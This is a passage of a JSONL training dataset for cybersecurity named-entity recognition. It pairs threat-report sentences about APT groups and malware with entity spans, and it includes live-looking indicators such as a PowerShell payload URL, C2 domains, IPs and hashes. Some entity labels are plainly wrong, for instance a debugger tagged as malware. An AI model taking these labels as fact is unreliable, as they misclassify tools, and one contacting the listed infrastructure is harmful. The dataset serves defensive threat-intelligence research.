The group 's long - standing center focus has been Ukraine , where it has carried out a campaign of disruptive and destructive attacks over the past decade using wiper malware , including during Russia 's re - invasion in 2022 .", "spans": {"TOOL: RAT": [[189, 192]], "THREAT_ACTOR: actors": [[225, 231]], "MALWARE: POSHC2": [[402, 408]], "IP_ADDRESS: 192.119.15.35 880": [[418, 435]], "URL: http://mynetwork.ddns.net:880/st-36-p4578.ps1": [[436, 481]], "ORGANIZATION: Ukraine": [[535, 542]], "MALWARE: wiper malware": [[646, 659]]}, "info": {"id": "cyberner_stix_train_003078", "source": "cyberner_stix_train"}} {"text": "a37f5d2418c5f2f64d06ba28fe62edee1293a56158ddfa9f04020e316054363f db59407f72666526fca23d31e3b4c5df86f25eff178e17221219216c6975c63f e0acbb0d7e55fb67e550a6bf5cf5c499a9960eaf5f037b785f9004585202593b Exodus One Package Names com.phonecarrier.linecheck However , full details on XENOTIME and other group tools , techniques , procedures , and infrastructure is available to network defenders via Dragos WorldView . The malware can delete various requests based on the command below . Cisco Secure Web Appliance ( formerly Web Security Appliance ) automatically blocks potentially dangerous sites and tests suspicious sites before users access them .", "spans": {"MALWARE: Exodus One": [[195, 205]], "THREAT_ACTOR: XENOTIME": [[273, 281]], "ORGANIZATION: Dragos WorldView": [[389, 405]], "TOOL: Cisco Secure Web Appliance": [[477, 503]], "TOOL: Web Security Appliance": [[515, 537]]}, "info": {"id": "cyberner_stix_train_003079", "source": "cyberner_stix_train"}} {"text": "Data is eventually exfiltrated over a TLS connection to the Command & Control server ws.my-local-weather [ . The attacks targeted high-profile targets , including government and commercial organizations . The announcement states that porn , gambling and entertainment sites will be blocked 9e4464d8dc8a3984561a104a93a7b8d6eb3d622d5187ae1d3fa6f6dafa2231a8 . 
Previous versions of TIEDYE were configured to persist via a LaunchAgent .", "spans": {"ORGANIZATION: government": [[163, 173]], "ORGANIZATION: commercial organizations": [[178, 202]], "FILEPATH: 9e4464d8dc8a3984561a104a93a7b8d6eb3d622d5187ae1d3fa6f6dafa2231a8": [[290, 354]], "MALWARE: Previous versions of TIEDYE": [[357, 384]]}, "info": {"id": "cyberner_stix_train_003080", "source": "cyberner_stix_train"}} {"text": "In fact , the oldest samples of the loader that we have found were used with PinchDuke .", "spans": {"TOOL: loader": [[36, 42]], "MALWARE: PinchDuke": [[77, 86]]}, "info": {"id": "cyberner_stix_train_003081", "source": "cyberner_stix_train"}} {"text": "Other variants use other names and logos , as described later . This mode of operation is typical of many hacker groups—and especially of Winnti . About four months after The New York Times publicized an attack on its network , the APT12 behind the intrusion deployed updated versions of their Backdoor.APT.Aumlib and Backdoor.APT.Ixeshe malware families .", "spans": {"THREAT_ACTOR: hacker": [[106, 112]], "THREAT_ACTOR: Winnti": [[138, 144]], "ORGANIZATION: The New York Times": [[171, 189]], "THREAT_ACTOR: APT12": [[232, 237]], "MALWARE: Backdoor.APT.Aumlib": [[294, 313]], "MALWARE: Backdoor.APT.Ixeshe malware families": [[318, 354]]}, "info": {"id": "cyberner_stix_train_003082", "source": "cyberner_stix_train"}} {"text": "\" Due to the special RAM disk feature of Android devices ' boot partition , all current mobile antivirus products in the world ca n't completely remove this Trojan or effectively repair the system . It is therefore possible that the large percentage of high value targets identified in our analysis of the GhostNet are coincidental , spread by contact between individuals who previously communicated through e-mail . Establishing a foothold involves actions that ensure control of the target network ’s systems from outside the network . 
The Metasploit code was released on December 29 , 2012 and the vulnerability was officialy fixed on January 14 , 2013 ( MS13 - 008 ) while the page with the exploit was uploaded on February 11 , 2013 .", "spans": {"SYSTEM: Android": [[41, 48]], "VULNERABILITY: vulnerability": [[601, 614]]}, "info": {"id": "cyberner_stix_train_003083", "source": "cyberner_stix_train"}} {"text": "RCSession was extracted from a file called English.rtf and launched via a hollowed svchost.exe process .", "spans": {"MALWARE: RCSession": [[0, 9]], "FILEPATH: English.rtf": [[43, 54]], "FILEPATH: svchost.exe": [[83, 94]]}, "info": {"id": "cyberner_stix_train_003084", "source": "cyberner_stix_train"}} {"text": "Based on this information , CTU researchers assess that TG-3390 aims to collect defense technology and capability intelligence , other industrial intelligence , and political intelligence from governments and NGOs . The purpose of these steps is to target users in Switzerland and hijack their traffic After deobfuscating the malware , we found the target domains :", "spans": {"ORGANIZATION: CTU": [[28, 31]], "THREAT_ACTOR: TG-3390": [[56, 63]], "ORGANIZATION: political intelligence": [[165, 187]], "ORGANIZATION: governments and NGOs": [[193, 213]]}, "info": {"id": "cyberner_stix_train_003085", "source": "cyberner_stix_train"}} {"text": "The compiled code itself already is altered per deployment in multiple subtle ways , in order to stymie identification and automated analysis and accommodate targeted environments .", "spans": {}, "info": {"id": "cyberner_stix_train_003086", "source": "cyberner_stix_train"}} {"text": "The botnet initially consisted of IP cameras and basic home routers , two types of IoT devices commonly found in the household .", "spans": {"TOOL: IoT": [[83, 86]]}, "info": {"id": "cyberner_stix_train_003087", "source": "cyberner_stix_train"}} {"text": "Instead , the user must scroll to the third page of the document , which will load a Flash object that contains 
ActionScript that will attempt to exploit the user ’s system to install a malicious payload .", "spans": {"TOOL: Flash": [[85, 90]], "TOOL: ActionScript": [[112, 124]]}, "info": {"id": "cyberner_stix_train_003088", "source": "cyberner_stix_train"}} {"text": "Once received , Responder masquerades as the sought-out resource and causes the victim computer to send the username and hashed password to the attacker-controlled machine .", "spans": {"TOOL: Responder": [[16, 25]]}, "info": {"id": "cyberner_stix_train_003089", "source": "cyberner_stix_train"}} {"text": "Attackers are growing smarter , targeting individuals through the devices and the services they use most . At this stage , the malware gathers information about the infected computer . APT1 uses hijacked FQDNs for two main purposes . Recognizing and stopping the above malicious JavaScript request requires advanced visibility solutions that can detect the access and exfiltration of sensitive user data ( in this case the user ’s email address and password ) .", "spans": {"THREAT_ACTOR: APT1": [[185, 189]], "TOOL: FQDNs": [[204, 209]]}, "info": {"id": "cyberner_stix_train_003090", "source": "cyberner_stix_train"}} {"text": "The “ core ” module will use one of two methods to infect the application – Decompile and Binary . However , it is still widely used , notably in Russia . These are the same two URLs that Dexphot use later to establish persistence , update the malware , and re-infect the device . 
Instead , victims would end up infecting their computers with the NetSupport RAT , allowing threat actors to gain remote access and deliver additional payloads .", "spans": {"MALWARE: Dexphot": [[188, 195]], "ORGANIZATION: victims": [[291, 298]], "TOOL: NetSupport RAT": [[347, 361]], "THREAT_ACTOR: threat actors": [[373, 386]]}, "info": {"id": "cyberner_stix_train_003091", "source": "cyberner_stix_train"}} {"text": "It is easy to imagine a security analyst , burdened by the amount of attacks against their network , dismissing such common-looking spam as “ just another crimeware spam run ” , allowing the campaign to , in essence , hide in the masses .", "spans": {}, "info": {"id": "cyberner_stix_train_003092", "source": "cyberner_stix_train"}} {"text": "These examples reveal BRONZE PRESIDENT 's likely intent to conduct political espionage in other countries in addition to targeting NGOs .", "spans": {"THREAT_ACTOR: BRONZE PRESIDENT": [[22, 38]], "ORGANIZATION: NGOs": [[131, 135]]}, "info": {"id": "cyberner_stix_train_003093", "source": "cyberner_stix_train"}} {"text": "This group , which has been attributed by various security teams , is believed to be comprised of three subgroups :", "spans": {}, "info": {"id": "cyberner_stix_train_003094", "source": "cyberner_stix_train"}} {"text": "For example , one sent out to a handful of countries identifies network drives when they are added to target systems , and then RC4 like-encrypts and writes certain file metadata and contents to a local path for later Exfiltration .", "spans": {}, "info": {"id": "cyberner_stix_train_003096", "source": "cyberner_stix_train"}} {"text": "The configuration file then loads the Trochilus payload into memory by injecting it into a valid system process . 
Confucius targeted a particular set of individuals in South Asian countries , such as military personnel and businessmen , among others .", "spans": {"MALWARE: configuration file": [[4, 22]], "ORGANIZATION: military personnel": [[200, 218]], "ORGANIZATION: businessmen": [[223, 234]]}, "info": {"id": "cyberner_stix_train_003097", "source": "cyberner_stix_train"}} {"text": "The IP address of both ora.carlaarrabitoarchitetto [ . The main part of the BalkanRAT malware is a copy of the Remote Utilities software for remote access . PyCommands , meanwhile , are Python scripts that automate tasks for Immunity Debugger , a popular tool for reverse-engineering malware binaries .", "spans": {"MALWARE: BalkanRAT malware": [[76, 93]], "TOOL: Python": [[186, 192]], "MALWARE: Immunity Debugger": [[225, 242]]}, "info": {"id": "cyberner_stix_train_003098", "source": "cyberner_stix_train"}} {"text": "A Communication Channel via Stolen SMS In addition , TrickMo has an automatic mechanism to send SMS messages to its C & C server . The lack of any significant evidence of shared code between any of these backdoor families is another clue as to the scope of the resources on which the activity group is able to draw , and the precautions the group is willing and able to take in order to avoid losing its ability to conduct its espionage operations . 
According to Symantec telemetry , almost 40 percent of Orangeworm 's confirmed victim organizations operate within the healthcare industry .", "spans": {"MALWARE: TrickMo": [[53, 60]], "THREAT_ACTOR: activity group": [[284, 298]], "THREAT_ACTOR: group": [[341, 346]], "ORGANIZATION: Symantec": [[463, 471]], "ORGANIZATION: healthcare industry": [[569, 588]]}, "info": {"id": "cyberner_stix_train_003099", "source": "cyberner_stix_train"}} {"text": "Poseidon Group is dedicated to running targeted attacks campaigns to aggressively collect information from company networks through the use of spear-phishing packaged with embedded , executable elements inside office documents and extensive lateral movement tools . Nitro 's campaign focused on the chemical sector with the goal of obtaining sensitive documents such as proprietary designs , formulas , and manufacturing processes .", "spans": {"THREAT_ACTOR: Poseidon Group": [[0, 14]], "THREAT_ACTOR: Nitro": [[266, 271]], "ORGANIZATION: chemical sector": [[299, 314]]}, "info": {"id": "cyberner_stix_train_003100", "source": "cyberner_stix_train"}} {"text": "Collect information on surrounding cellular towers ( BTS ) . Strider has been active since at least October 2011 . For more information about part one , click here . Because indicators of attack are all about interactions with your network , it may be possible that the actions performed during the early stages of the cyberattack kill chain are not considered harmful .", "spans": {"THREAT_ACTOR: Strider": [[61, 68]]}, "info": {"id": "cyberner_stix_train_003101", "source": "cyberner_stix_train"}} {"text": "At any time an infected application will create an activity , this method will be called , and call ‘ requestAd ’ from “ Agent Smith ’ s code . Clever Kitten has moved to leveraging strategic web compromises . Although Dexphot always uses a cryptocurrency miner of some kind , it ’s not always the same miner . 
Beginning in January 2021 , Mandiant Managed Defense observed multiple instances of abuse of Microsoft Exchange Server within at least one client environment .", "spans": {"MALWARE: Agent Smith": [[121, 132]], "THREAT_ACTOR: Clever Kitten": [[144, 157]], "MALWARE: Dexphot": [[219, 226]], "ORGANIZATION: Mandiant Managed Defense": [[339, 363]], "SYSTEM: Microsoft Exchange Server": [[404, 429]]}, "info": {"id": "cyberner_stix_train_003102", "source": "cyberner_stix_train"}} {"text": "The Cybereason Nocturnus team is monitoring multiple underground platforms in an attempt to identify chatter relating to EventBot . The first confirmed date when TajMahal samples were seen on a victim’s machine is August 2014 . While the recent paper from Trend Micro and ClearSky ( ' The Spy Kittens Are Back : Rocket Kitten 2 ' ) does extensively cover the campaign 's narrative , we aimed to seek confirmation that our analyzed attack was positively connected to the same campaign and set out to provide additional value and insight .", "spans": {"ORGANIZATION: Cybereason Nocturnus": [[4, 24]], "MALWARE: EventBot": [[121, 129]], "MALWARE: TajMahal": [[162, 170]], "ORGANIZATION: Trend Micro": [[256, 267]], "ORGANIZATION: ClearSky": [[272, 280]], "THREAT_ACTOR: Spy Kittens": [[289, 300]], "THREAT_ACTOR: Rocket Kitten": [[312, 325]]}, "info": {"id": "cyberner_stix_train_003103", "source": "cyberner_stix_train"}} {"text": "Enigma packer artifacts in file metadata ( SHA-256: b08b8fddb9dd940a8ab91c9cb29db9bb611a5c533c9489fb99e36c43b4df1eca ) .", "spans": {"TOOL: Enigma": [[0, 6]], "FILEPATH: b08b8fddb9dd940a8ab91c9cb29db9bb611a5c533c9489fb99e36c43b4df1eca": [[52, 116]]}, "info": {"id": "cyberner_stix_train_003104", "source": "cyberner_stix_train"}} {"text": "] meacount-manager [ . In this case , the file used the software name \" Cyberlink \" , and a description of \" CLMediaLibrary Dynamic Link Library \" and listing version 4.19.9.98 . 
In the last two years alone , we have confirmed 937 APT1 C2 servers — that is , actively listening or communicating programs — running on 849 distinct IP addresses . Adversaries may abuse these features to hide artifacts such as files , directories , user accounts , or other system activity to evade detection.[1][2][3 ]", "spans": {"MALWARE: Cyberlink": [[72, 81]], "THREAT_ACTOR: APT1": [[231, 235]], "TOOL: C2": [[236, 238]], "THREAT_ACTOR: Adversaries": [[345, 356]]}, "info": {"id": "cyberner_stix_train_003105", "source": "cyberner_stix_train"}} {"text": "Tune the file reputation systems of your anti-virus software to the most aggressive setting possible .", "spans": {}, "info": {"id": "cyberner_stix_train_003106", "source": "cyberner_stix_train"}} {"text": "New versions of FakeSpy masquerade as government post office apps and transportation services apps . News reported that the U.S. Cyber Command launched cyberattacks on an Iranian spy group . Just a few months later , in February 2015 , we announced the discovery of Carbanak , a cyber-criminal gang that used custom malware and APT techniques to steal millions of dollars while infecting hundreds of financial institutions in at least 30 countries .", "spans": {"MALWARE: FakeSpy": [[16, 23]], "ORGANIZATION: U.S. 
Cyber": [[124, 134]], "THREAT_ACTOR: group": [[183, 188]], "MALWARE: Carbanak": [[266, 274]], "THREAT_ACTOR: cyber-criminal gang": [[279, 298]], "ORGANIZATION: financial institutions": [[400, 422]]}, "info": {"id": "cyberner_stix_train_003107", "source": "cyberner_stix_train"}} {"text": "It first starts another activity defined in “ org.starsizew.Aa ” to request device administrator privileges , and then calls the following API of “ android.content.pm.PackageManager ” ( the Android package manager to remove its own icon on the home screen in order to conceal the existence of RuMMS from the user : At the same time , ” org.starsizew.MainActivity ” will start the main service as defined in “ org.starsizew.Tb ” , and use a few mechanisms to keep the main service running continuously In May 2016 , Unit 42 observed attacks of OilRig primarily focused on financial institutions and technology organizations within Saudi Arabia . So let ’s start to dissect the macros . Unlike a number of past cases of Iranian statesponsored social media phishing that have focused on Irans neighbors , this latest campaign appears to have largely targeted Americans and to a lesser extent British and European victims .", "spans": {"SYSTEM: Android": [[190, 197]], "MALWARE: RuMMS": [[293, 298]], "ORGANIZATION: Unit 42": [[515, 522]], "THREAT_ACTOR: OilRig": [[543, 549]], "ORGANIZATION: financial institutions": [[571, 593]], "ORGANIZATION: technology organizations": [[598, 622]], "TOOL: macros": [[676, 682]], "ORGANIZATION: Irans neighbors": [[784, 799]], "ORGANIZATION: Americans": [[856, 865]], "ORGANIZATION: British and European victims": [[889, 917]]}, "info": {"id": "cyberner_stix_train_003108", "source": "cyberner_stix_train"}} {"text": "] 230 [ . Of note , we also discovered the Sofacy group using a very similar delivery document to deliver a new Trojan called Cannon . The area highlighted in blue is the shape name that is being located , while the text itself is highlighted in red . 
If you can not apply the KB5019758 patch immediately , you should disable OWA until the patch can be applied .", "spans": {"THREAT_ACTOR: Sofacy group": [[43, 55]], "TOOL: Trojan": [[112, 118]], "TOOL: Cannon": [[126, 132]]}, "info": {"id": "cyberner_stix_train_003109", "source": "cyberner_stix_train"}} {"text": "Fragment of the database with targeted devices and specific memory addresses If the infected device is not listed in this database , the exploit tries to discover these addresses programmatically . specifically CVE-2018-0798 , before downloading subsequent payloads . Tropic Trooper is an unaffiliated threat group that has led targeted campaigns against targets in Taiwan , the Philippines , and Hong Kong .", "spans": {"VULNERABILITY: CVE-2018-0798": [[211, 224]], "THREAT_ACTOR: Tropic Trooper": [[268, 282]]}, "info": {"id": "cyberner_stix_train_003110", "source": "cyberner_stix_train"}} {"text": "WICKED PANDA refers to the targeted intrusion operations of the actor publicly known as \" Winnti \" , whereas WICKED SPIDER represents this group 's financially-motivated criminal activity . 
APT28 spearphished targets in several waves with Flash exploits leading to their Carberp based JHUHUGIT downloaders and further stages of malware .", "spans": {"THREAT_ACTOR: WICKED PANDA": [[0, 12]], "THREAT_ACTOR: WICKED SPIDER": [[109, 122]], "THREAT_ACTOR: APT28": [[190, 195]], "TOOL: Flash": [[239, 244]], "VULNERABILITY: exploits": [[245, 253]], "MALWARE: Carberp": [[271, 278]], "MALWARE: JHUHUGIT downloaders": [[285, 305]]}, "info": {"id": "cyberner_stix_train_003111", "source": "cyberner_stix_train"}} {"text": "These attacks occurred in several different countries , but our investigation revealed that the primary targets were individuals and organizations primarily located in India .", "spans": {}, "info": {"id": "cyberner_stix_train_003112", "source": "cyberner_stix_train"}} {"text": "Shamoon is designed to destroy computer hard drives by wiping the master boot record ( MBR ) and data irretrievably , unlike ransomware , which holds the data hostage for a fee .", "spans": {"MALWARE: Shamoon": [[0, 7]]}, "info": {"id": "cyberner_stix_train_003113", "source": "cyberner_stix_train"}} {"text": "A similar tool , with the same filename , has been discussed in previous research but the SpyDealer malware appears unrelated to HenBox . APT41 uses many of the same tools and compromised digital certificates that have been leveraged by other Chinese espionage operators . 
Once a foothold is established , they try to upload more backdoors , USB stealers as well as other hacking tools such as \" Mimikatz \" for lateral movement .", "spans": {"MALWARE: SpyDealer": [[90, 99]], "MALWARE: HenBox": [[129, 135]], "THREAT_ACTOR: APT41": [[138, 143]], "TOOL: digital certificates": [[188, 208]], "MALWARE: backdoors": [[330, 339]], "MALWARE: USB stealers": [[342, 354]], "MALWARE: Mimikatz": [[396, 404]]}, "info": {"id": "cyberner_stix_train_003114", "source": "cyberner_stix_train"}} {"text": "In fact , recent variants contain code forked from an open-source machine learning module used by developers to automatically resize and crop images based on screen size , a valuable function given the variety of Android devices . The Ke3chang have used three types of malware over the years and have traditionally targeted the aerospace , energy , government , high-tech , consulting services , chemicals , manufacturing , mining sectors . The modified code is available publically here . We highly suspect the “ Pig network ” to have also been used as a bulletproof hosting service for cybercriminals who are unrelated to the Winnti group .", "spans": {"SYSTEM: Android": [[213, 220]], "THREAT_ACTOR: Ke3chang": [[235, 243]], "ORGANIZATION: aerospace": [[328, 337]], "ORGANIZATION: energy": [[340, 346]], "ORGANIZATION: government": [[349, 359]], "ORGANIZATION: high-tech": [[362, 371]], "ORGANIZATION: consulting services": [[374, 393]], "ORGANIZATION: chemicals": [[396, 405]], "ORGANIZATION: manufacturing": [[408, 421]], "ORGANIZATION: mining sectors": [[424, 438]], "SYSTEM: Pig network": [[514, 525]], "SYSTEM: bulletproof hosting service": [[556, 583]], "THREAT_ACTOR: Winnti group": [[628, 640]]}, "info": {"id": "cyberner_stix_train_003115", "source": "cyberner_stix_train"}} {"text": "From our trend analysis seen in Figure 3 , Locky ransomware started being delivered via DOCM format email attachments more extensively beginning in August . 
While not detected at the time , Microsoft 's antivirus and security products now detect this Barium malicious file and flag the file as \" Win32/ShadowPad.A \" .", "spans": {"MALWARE: Locky": [[43, 48]], "ORGANIZATION: Microsoft": [[190, 199]], "THREAT_ACTOR: Barium": [[251, 257]], "FILEPATH: Win32/ShadowPad.A": [[296, 313]]}, "info": {"id": "cyberner_stix_train_003116", "source": "cyberner_stix_train"}} {"text": "A snapshot of the code that processes each VM opcode and the associate interpreter The presence of a VM and virtualized instruction blocks can be described in simpler terms : Essentially , the creators of FinFisher interposed a layer of dynamic code translation ( the virtual machine ) that makes analysis using regular tools practically impossible . Of note , this is three years earlier than the oldest Elise sample we have found , suggesting this group has been active longer than previously documented . Given the popularity of the compromised application that is still being distributed by its developer , it wouldn’t be surprising if the number of victims is in the tens or hundreds of thousands . 
There are also many examples of nation - state actors leveraging contractors to develop offensive capabilities , as shown most recently in contracts between Russia ’s Ministry of Defense and NTC Vulkan .", "spans": {"MALWARE: snapshot": [[2, 10]], "MALWARE: FinFisher": [[205, 214]], "TOOL: Elise sample": [[405, 417]], "THREAT_ACTOR: group": [[450, 455]], "THREAT_ACTOR: nation - state actors": [[736, 757]], "THREAT_ACTOR: Russia ’s Ministry of Defense": [[861, 890]], "THREAT_ACTOR: NTC Vulkan": [[895, 905]]}, "info": {"id": "cyberner_stix_train_003117", "source": "cyberner_stix_train"}} {"text": "PIVY also played a key role in the 2011 campaign known as Nitro that targeted chemical makers , government agencies , defense contractors , and human rights groups.10,11 Still active a year later , the Nitro attackers used a zero-day vulnerability in Java to deploy PIVY in 2012 . TAA leverages advanced artificial intelligence and machine learning that combs through Symantec 's data lake of telemetry in order to spot patterns associated with targeted attacks .", "spans": {"TOOL: PIVY": [[0, 4], [266, 270]], "ORGANIZATION: government agencies": [[96, 115]], "ORGANIZATION: defense contractors": [[118, 137]], "THREAT_ACTOR: attackers": [[208, 217]], "VULNERABILITY: zero-day vulnerability": [[225, 247]], "ORGANIZATION: TAA": [[281, 284]], "ORGANIZATION: Symantec": [[368, 376]]}, "info": {"id": "cyberner_stix_train_003118", "source": "cyberner_stix_train"}} {"text": "The description in Portuguese promises more protection for the user ’ s applications , including end-to-end encryption . TA505 targeted Middle Eastern countries in a June 11 campaign that delivered more than 90% of the total spam emails to the UAE , Saudi Arabia , and Morroco . 
While the capabilities for the installers , loaders , and uninstallers in this report are relatively straight forward and single-focused , analysis of these malware families provide further insight into the capabilities of the Lazarus Group .", "spans": {"THREAT_ACTOR: TA505": [[121, 126]], "MALWARE: installers": [[310, 320]], "MALWARE: loaders": [[323, 330]], "MALWARE: uninstallers": [[337, 349]], "THREAT_ACTOR: Lazarus Group": [[506, 519]]}, "info": {"id": "cyberner_stix_train_003119", "source": "cyberner_stix_train"}} {"text": "After compromising a network , the threat actors elevate their privileges and install malware on a large proportion of systems .", "spans": {}, "info": {"id": "cyberner_stix_train_003120", "source": "cyberner_stix_train"}} {"text": "As Lookout first reported more than eight months ago , the problem with Shedun/HummingBad and similar malicious app families that silently exploit Android rooting vulnerabilities is that the infections can survive normal factory resets . Leafminer attempts to infiltrate target networks through various means of intrusion : watering hole websites , vulnerability scans of network services on the internet , and brute-force login attempts . APT33 : 5.79.127.177 mypsh.ddns.net . 
\" Learn about indicators of compromise and their role in detection and response in Data Protection 101 , our series on the fundamentals of information security .", "spans": {"ORGANIZATION: Lookout": [[3, 10]], "MALWARE: Shedun/HummingBad": [[72, 89]], "VULNERABILITY: Android rooting vulnerabilities": [[147, 178]], "THREAT_ACTOR: Leafminer": [[238, 247]], "THREAT_ACTOR: APT33": [[440, 445]], "IP_ADDRESS: 5.79.127.177": [[448, 460]], "DOMAIN: mypsh.ddns.net": [[461, 475]], "ORGANIZATION: Data Protection 101": [[561, 580]]}, "info": {"id": "cyberner_stix_train_003121", "source": "cyberner_stix_train"}} {"text": "It is clear that this RAT is under intense development , however , the addition and removal of packages , along with the huge quantity of unused code and usage of deprecated and old techniques denotes an amateur development methodology . The attacks in that case took place in late September to early October 2016 and the attackers stored the MoonWind samples as RAR files , while in the November attacks the RATs were stored as executables . WATERSPOUT was compiled within two days of the last HIGHTIDE backdoor and on the same day as the THREEBYTE backdoor . 
Instead , victims would end up infecting their computers with the NetSupport RAT , allowing threat actors to gain remote access and deliver additional payloads .", "spans": {"TOOL: MoonWind samples": [[343, 359]], "TOOL: RAR files": [[363, 372]], "TOOL: RATs": [[409, 413]], "MALWARE: WATERSPOUT": [[443, 453]], "MALWARE: HIGHTIDE backdoor": [[495, 512]], "MALWARE: THREEBYTE backdoor": [[540, 558]], "ORGANIZATION: victims": [[571, 578]], "TOOL: NetSupport RAT": [[627, 641]], "THREAT_ACTOR: threat actors": [[653, 666]]}, "info": {"id": "cyberner_stix_train_003122", "source": "cyberner_stix_train"}} {"text": "In the The first wave of attack , The attackers spoofed an email id that is associated with Indian Ministry of Home Affairs ( MHA ) and an email was sent on September 20th , 2016 ( just 2 days after the Uri terror attack ) to an email id associated with the Indian Embassy in Japan .", "spans": {"TOOL: email": [[59, 64], [139, 144], [229, 234]], "ORGANIZATION: Ministry of Home Affairs": [[99, 123]], "ORGANIZATION: MHA": [[126, 129]], "ORGANIZATION: Indian Embassy": [[258, 272]]}, "info": {"id": "cyberner_stix_train_003123", "source": "cyberner_stix_train"}} {"text": "Other configuration data is located elsewhere , and some of it can been seen here : The encrypted library path The output folder on the device for the dropped library The name of the library after it is loaded eventBot name string Version number A string used as an RC4 key , both for decrypting the library and as a part of the network data encryption ( hasn ’ t changed from the previous version ) The C2 URLs A randomized class name using the device ’ s accessibility services EventBot extracted configuration Part of the extracted configuration of the new version Whenever users reboot their device or open up Network Speed Master , SWAnalytics will fetch the latest configuration file from http[:]//mbl[.]shunwang[.]com/cfg/config[.]json” . 
SecureWorks Counter Threat Unit ( CTU ) researchers analyzed a phishing campaign that targeted a Middle Eastern organization in early January 2017 .", "spans": {"MALWARE: EventBot": [[480, 488]], "MALWARE: SWAnalytics": [[637, 648]], "ORGANIZATION: SecureWorks Counter Threat Unit": [[746, 777]], "ORGANIZATION: CTU": [[780, 783]], "ORGANIZATION: organization": [[858, 870]]}, "info": {"id": "cyberner_stix_train_003124", "source": "cyberner_stix_train"}} {"text": "Instruct administrators to use non-privileged accounts for standard functions such as web browsing or checking webmail .", "spans": {}, "info": {"id": "cyberner_stix_train_003125", "source": "cyberner_stix_train"}} {"text": "] 191 [ . Once a foothold is established , they try to upload more backdoors , USB stealers as well as other hacking tools such as \" Mimikatz \" for lateral movement . The variable names themselves are not relevant , however the methods in bold below will retrieve the AlternativeText field from the specified shape , which is then executed . The operation targeted individuals from three groups Senior thinktank personnel researching the Middle East , journalists focused on the region , and academics , including senior professors .", "spans": {"TOOL: backdoors": [[67, 76]], "TOOL: USB stealers": [[79, 91]], "TOOL: Mimikatz": [[133, 141]], "TOOL: AlternativeText": [[268, 283]], "ORGANIZATION: Senior thinktank personnel researching the Middle East": [[395, 449]], "ORGANIZATION: journalists focused on the region": [[452, 485]], "ORGANIZATION: and academics , including senior professors": [[488, 531]]}, "info": {"id": "cyberner_stix_train_003126", "source": "cyberner_stix_train"}} {"text": "For example , sending text “ Balance ” will trigger a response with the victim ’ s wallet balance . During the past few months , APT34 has been able to quickly incorporate exploits for at least two publicly vulnerabilities ( CVE-2017-0199 and CVE-2017-11882 ) to target organizations in the Middle East . 
Attackers can abuse well-known cloud providers and abuse their reputations in order to avoid detection . To boot , there was a 75 percent increase in the average number of monthly attacks in the US between the first and second half of the last 12 months .", "spans": {"THREAT_ACTOR: APT34": [[129, 134]], "VULNERABILITY: CVE-2017-0199": [[225, 238]], "VULNERABILITY: CVE-2017-11882": [[243, 257]], "TOOL: well-known cloud providers": [[325, 351]], "THREAT_ACTOR: monthly attacks": [[477, 492]]}, "info": {"id": "cyberner_stix_train_003127", "source": "cyberner_stix_train"}} {"text": "The samples we identified target the ATM vendor Diebold . Barium specializes in targeting high value organizations holding sensitive data , by gathering extensive information about their employees through publicly available information and social media , using that information to fashion phishing attacks intended to trickthose employees into compromising their computers and networks .", "spans": {"MALWARE: samples": [[4, 11]], "ORGANIZATION: ATM vendor Diebold": [[37, 55]], "THREAT_ACTOR: Barium": [[58, 64]], "ORGANIZATION: employees": [[187, 196], [329, 338]], "ORGANIZATION: social media": [[240, 252]]}, "info": {"id": "cyberner_stix_train_003128", "source": "cyberner_stix_train"}} {"text": "Google also stated that they are taking numerous steps including proactively notifying affected accounts , revoking affected tokens and deploying SafetyNet improvements to protect users from these apps in the future . This is corroborated by our identification of TEMP.Hermit 's use of MACKTRUCK at a bank , preceding the APT38 operation targeting the bank 's SWIFT systems in late 2015 . 
One layer will detect shellcode , Ashley Madison ’s executives understood that only a handful of employees at the time would have had access to the systems needed to produce the screenshots McNeill published online .", "spans": {"ORGANIZATION: Google": [[0, 6]], "THREAT_ACTOR: TEMP.Hermit": [[264, 275]], "TOOL: MACKTRUCK": [[286, 295]], "THREAT_ACTOR: APT38": [[322, 327]], "ORGANIZATION: bank": [[352, 356]], "ORGANIZATION: Ashley Madison ’s": [[423, 440]], "SYSTEM: systems needed to produce the screenshots McNeill published online": [[537, 603]]}, "info": {"id": "cyberner_stix_train_003129", "source": "cyberner_stix_train"}} {"text": "Ransom demands have varied significantly , suggesting that INDRIK SPIDER likely calculates the ransom amount based on the size and value of the victim organization . Another set of attacks called Operation Erebus leverages another flash exploit , CVE-2016-4117 , and relies on watering hole attacks as a means of propagation .", "spans": {"THREAT_ACTOR: INDRIK SPIDER": [[59, 72]], "TOOL: flash": [[231, 236]], "VULNERABILITY: exploit": [[237, 244]], "VULNERABILITY: CVE-2016-4117": [[247, 260]]}, "info": {"id": "cyberner_stix_train_003130", "source": "cyberner_stix_train"}} {"text": "There have been cases in the past where a threat actor attempted to mimic another to thwart attribution efforts , and as such , attribution should rarely be taken as is , but instead with a grain of salt and critical thinking .", "spans": {}, "info": {"id": "cyberner_stix_train_003131", "source": "cyberner_stix_train"}} {"text": "The Pierogi Campaign : This campaign uses social engineering attacks to infect victims with a new , undocumented backdoor dubbed Pierogi .", "spans": {"MALWARE: Pierogi": [[4, 11], [129, 136]]}, "info": {"id": "cyberner_stix_train_003132", "source": "cyberner_stix_train"}} {"text": "The strings of code , for one , are similarly structured . 
ScarCruft is a relatively new APT group ; victims have been observed in Russia , Nepal , South Korea , China , India , Kuwait and Romania . The FIN7 intrusion set continued its tailored spear phishing campaigns throughout last year . The samples we have observed seemed not to be malware targeted for the game fans but a malware module which accidentally got into [ the ] wrong place .", "spans": {"THREAT_ACTOR: ScarCruft": [[59, 68]], "THREAT_ACTOR: FIN7": [[203, 207]], "MALWARE: malware": [[339, 346]], "ORGANIZATION: the game fans": [[360, 373]], "MALWARE: a malware module": [[378, 394]]}, "info": {"id": "cyberner_stix_train_003133", "source": "cyberner_stix_train"}} {"text": "CTU researchers recognize that the evidence supporting this attribution is circumstantial .", "spans": {"ORGANIZATION: CTU": [[0, 3]]}, "info": {"id": "cyberner_stix_train_003134", "source": "cyberner_stix_train"}} {"text": "Since the 2016 publication , Microsoft has come across an evolution of PLATINUM 's file-transfer tool , one that uses the Intel Active Management Technology ( AMT ) Serial-over-LAN ( SOL ) channel for communication . The purpose of the attacks appears to be industrial espionage , collecting intellectual property for competitive advantage .", "spans": {"ORGANIZATION: Microsoft": [[29, 38]], "THREAT_ACTOR: PLATINUM": [[71, 79]], "TOOL: Intel Active Management Technology": [[122, 156]], "TOOL: AMT": [[159, 162]], "TOOL: Serial-over-LAN": [[165, 180]], "TOOL: SOL": [[183, 186]]}, "info": {"id": "cyberner_stix_train_003135", "source": 